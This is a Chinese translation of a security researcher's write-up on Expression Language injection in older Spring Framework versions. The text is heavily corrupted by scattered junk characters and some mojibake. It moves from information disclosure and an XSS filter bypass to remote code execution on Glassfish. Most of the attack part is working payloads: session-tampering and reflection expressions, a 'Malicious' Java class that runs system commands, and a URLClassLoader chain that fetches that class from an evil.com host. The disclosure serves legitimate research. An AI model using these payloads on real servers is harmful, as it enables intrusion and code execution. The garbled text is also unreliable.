Remote Code with% m2 q% u, `) C$ z1 ~& p, W
Expression Language Injection) ]" y* x# P/ e D3 v
Spring Framework脆弱性—DanAmodio" Q6 ]: W, p' {5 Z
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中% a' a) ?% x% Y: `) T0 a
可能会存在风险。
; p) M4 m, ^/ ?0 R1 n; A在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的$ U3 Q4 Z" n. Z
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可 @. y% H4 v$ e* @
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
$ S* r# r- R1 @5 `, Q以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前/ ]+ V% [7 T9 d: G# T
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
, b; g& q2 n Y3 j) x# H0 H1 _1 x由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
! k+ x( s8 v6 s. [: X7 y6 ~/ b我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版* p( N$ k4 d% u7 \7 ~
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。& M" T) H9 C% w1 H% T- V
这些版本不支持禁用double EL resolution.
8 R/ O) }0 o( a" h% S( C这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
( }+ L- j8 Y% }& O) W- O# O; L5 UEL2.2容器上可能进行远程代码执行。
7 b0 o0 `5 ]8 p2 Q8 v这是一个原始信息泄露的攻击例子:& \% f) B" }7 D' q* m; J* W% }
请求:
( e5 [1 M. R i3 ^9 gttp://vulnerable.com/foo?message=${applicationScope}
, D& J. {1 y7 {0 t+ _到达以下内容页面:$ s8 V+ S0 H. _$ e/ ?
结果将输出一些包含内部服务器信息calsspath 和本地工作目录- `5 y- w) Q) J3 p
你也可以做一些其他事情,如这样:* k" p5 ^3 u. O1 g) D e2 G
${9999+1}
+ v3 L7 h' Q$ u) x- U还可以访问session 对象和beans! _$ u. S, y; P" [$ M* a6 _1 }% B6 I
${employee.lastName}: _: e) G, e$ ~
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是/ p4 s6 `2 \) X, z% `$ e9 c
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
/ X) ^( J1 c7 W' Z) y# e西,比如XSS.. e/ N3 {# w" a2 U) u- q' S: n
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签% ]9 s* @5 {9 Q: n9 d. I* F
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
. z3 A# g8 U, ?呢?”8 N* R8 A* S# s# p; h
因此,我尝试巳缦拢�
8 U' S, `0 [) U7 ~: R! a3 B5 xhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP# J+ W {# s' Z' W0 S! w
P
2 g D4 V6 I# y6 ~ y, S2 o# ^7 S我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
. K* N2 s4 Y, r% }! D7 s- I回的文本被插入进了spring:message 标签。
+ k6 q5 T3 L% N; X. O" n; t% Z这里是一个最终绕过过滤的实例:$ S0 D9 W# Q$ a3 ~) [8 @ }
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ/ ~$ B( X) ?0 d' Y0 S) Q
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
! j- I' `9 k- C9 v什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
4 a* y% k u, k" M' l+ f2 a4 j经过一番研究,我学习到EL2.2 增加了方法调用。
3 t8 s" C. ]2 B" l7 Y- k我写了一个快速测试应用程序代码并且检测一些功能2 C, V+ Y0 ^0 Y X, H
${pageContext.request.getSession().setAttribute(“account”,”123456″)}5 }: J' V, `7 s3 y! X6 \
${pageContext.request.getSession().setAttribute(“admin”,true)}2 t- J X9 R8 L4 L# ^: U
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
' p3 C9 J2 y$ F4 b& v5 ^指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
3 _ L% Y1 L* A6 C5 H$ l( l${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
# Y" R5 K! X" {1 E“, 1234)}
, Q% L% M9 a; Y/ o${“”.getClass().forName(“java.lang.Runtime”)}$ y5 k) }8 V+ A0 n% k$ J: G, Q
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不% ~; P- p) o7 |# ?: ?$ Z( a! h0 H/ `4 P
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
, b* ?' L6 H) S8 S数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有5 o, A" s& y/ j! H/ [) g) w
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
8 R7 w' |8 y) G- Y方法签名invoke(Object obj, Object„ args)
/ E4 G- ^9 q# Y; S* ~ TJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问; U8 ~9 s- Q$ W( }
题,以让它可以工作起来。
# B3 V$ c. g# q; S5 e漏洞利用:
# Q8 s% a( U, A$ R& L, {5 E我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我1 C: P! P, {$ U( U
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
( n$ ?- {7 {. j! z. w; {' u这里有一些我试过的失败的用例,为了试图让它工作的用例:
% ?3 T6 S7 y; U' _; G. s* m2 m 写文件到文件系统# _5 {' Q! x! G9 U8 c+ l
试图载入org.springframework.expression.spel.standard.SpelExpressionParser., l$ d: L" w4 p& E; x/ x4 m" m1 V
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
, {0 @4 M4 f& P( ?# ]4 q% G9 X${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}" x6 @* ~- }/ `1 w. ]- S
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
8 S' r9 M; y* N# [org.springframework.expression.spel.standard.SpelExpressionParser not found
2 }/ Q( F6 R/ t/ H. Oby
1 N8 z( l; ~# p6 vorg.glassfish.web.javax.servlet.jsp [194].+ {! |% P8 }( d
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public2 e- l" Z( ?! k4 \2 k
利用反射来创建一个新的Runtime(and watch the world burn)
) w- F# W2 A Q" Y${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName$ `0 c7 D* i, p, p
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
# o. _& C0 Y3 z& m${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}6 D7 X! [/ A8 [4 ~9 {
使用java.lang.ProcessBuilder
% P1 p r, j* X& H 用表达式语言来评估表达式语言) A# G% z% Q! B" m
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.9 U% k4 h$ U3 w( O0 h! S: f
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
! w8 y5 I" o: X/ v“,”".getClass(),null)}- _/ `4 j* x' ^' j1 l
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
( S: v3 k$ u, w我在使用一个空数组通过Method.invoke()时失败了很多次 b- H1 M# i0 ]- k1 s# f
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo. }, N* n; A9 D2 S c
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
6 E' i5 [( k+ _! XrrayList”).newInstance().toArray())
5 {6 ^! ]; K) ujava.lang.IllegalArgumentException: wrong number of arguments. k% j+ P: K- ?- R) {; V
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可( M- g( t3 I) R4 @8 D
以创建一个恶意class文件并且指向类装载器.
8 l' ~, \& ]" C% B4 P我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
! r7 S) Q8 x( R# c% D4 F, j0 S' Fpublic class Malicious {
+ H. \7 d& Z! A! j5 S& w; Spublic Malicious() {
4 B1 ?! ], L( r& [' }0 ^ g( Etry {: j: t$ B% t/ i
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
" M0 F0 E8 C) Rjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win% e6 M* Y, p( L! D9 d
} catch (Exception e) {" \6 L- W8 |" U {: [7 r
}
4 z0 h; a6 P$ j$ n6 T( H}, X& y o- \0 ~( P
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
! y/ M0 _1 |( N% `; O) J话中,因此它可以被使用.3 D9 L x4 \& z0 P* @
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName$ P' [. ^' ~. ` V. u
(“java.util.ArrayList”).newInstance())}: f) o6 @ {- v7 [
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
& P' D9 y6 t8 Q" r一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和9 U, W+ B9 q, d5 I2 L( ]
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个9 B- S- f, R7 o' B8 u) ^1 f0 Z$ Q
我们可以调用的create(string)方法,然后转换对一个URL对象。, p5 ~% A! J, W$ U, I5 R
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
; x) \! ?( {1 \. x. p3 z) [$ Iere/malicious/classfile/is/located/”).toURL())}; A; H t' |9 ~
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,& Y4 `! G/ h8 z, V
恶意类文件被装载并创建,触发远程代码.; T* U b3 Z/ i
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte+ }- [1 S& N5 S r0 E* c
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().# C& Z L0 N& @$ z' s2 b
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
. {" s0 A* y4 ~0 `1 X) X- |: c()} |